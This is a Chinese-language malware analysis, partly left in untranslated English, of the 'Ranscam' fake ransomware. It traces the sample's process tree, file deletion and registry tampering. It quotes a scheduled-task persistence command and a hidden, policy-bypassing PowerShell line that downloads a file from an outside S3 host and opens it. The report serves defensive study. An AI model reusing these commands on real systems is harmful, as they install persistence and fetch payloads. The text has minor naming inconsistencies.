每周,我们都能看到新的勒索软件在威胁受害者获取赎金,今年7月,出现一个新的勒索软件,但其本身是个骗局,它对文件不进行加密而是直接删除,其最无耻的地方是即使用户支付了赎金,也不能解密受损文件,思科研究小组戏称它为“Ranscam”。
我们通过SandBlast Agent取证功能禁用所有的安全预防措施之后运行Ranscam,接下来一起看看我们的分析报告。
二:Ranscam树概览
攻击从双击运行Ranscam.exe文件开始,一旦运行,它会创建三个单独的文件,创建的文件中有2个是可执行文件:winstrp.exe 和 winopen.exewinopen.exe。
♞ 通过Ranscam.exe执行的第一个子进程(PID1224)是Windows计划任务,是运用Ranscam来进行引导,纵观schtasks.exe的进程参数,我们看到以下内容:
/Create /TN“Update\WVGtpmEUlXdWVGtpmEUlXdhuSpCpqZGMuTRLhuSpCpqZGMuTRL” /XML“C:\Users\xxxxxx\AppData\Local\Temp\z966”
♞ 该进程的加载信息被储存到XLS文件中
C:\Users\xxxxxx\AppData\Local\Temp\z966created earlier. The XML file contains configuration data that is used byWindows Task Scheduler to execute winstrsp.exe after boot. Of note is the factthat winstrsp.exe has the exact same contents as ranscam.exe as shown by thesuspicious event “Executable Copies”.
♞ Ranscam.exe (PID 1224)在执行完winopen.exe之后,会执行其自身的副本:Ranscam.exe(PID2560)。
♞ Ranscam.exe (PID 2560)渗透一个批处理文件,然后将其作为参数传递给cmd.exe (PID 1828),最终删除用户的所有文件,在整个进程中,cmd.exe (PID 1828)通过“dir /b”参数浏览用户文件夹,实际上会启动多个副本。
如图四所示,cmd.exe(PID1828)只能删除文件,它不会创建或者修改文件的名字,在其任何参与恶意攻击的进程中没有大量的文件变化,此次的恶意攻击并没有任何加密文件和赎金支付请求,这显然是一个骗局。
只是删除文件,
并没有创建新的文件或者重命名文件
cmd.exe(PID1828)企图通过键盘修改、禁用任务管理器、安全模式篡改执行reg.exe Windows修改注册表。
在用户所有文件被删除之后,powershell.exe (PID 2476)将执行以下参数:
-ExecutionPolicy bypass -noprofile-windowstyle hidden (New-ObjectSystem.Net.WebClient).DownloadFile(‘http://s3-us-west-1.amazonaws.com/docs.pdf/anon.jpg’,’C:\Users\xxxxxx\Desktop\Payment_Instructions.jpg’);cmd /c ‘C:\Users\xxxxxx\Desktop\Payment_Instructions.jpg’
从amazonaws.com下载的实际文件是anon.jpg,保存在系统中的是payment_instructions.jpg,然后JPG文件显示使用cmd.exe(PID 2456)。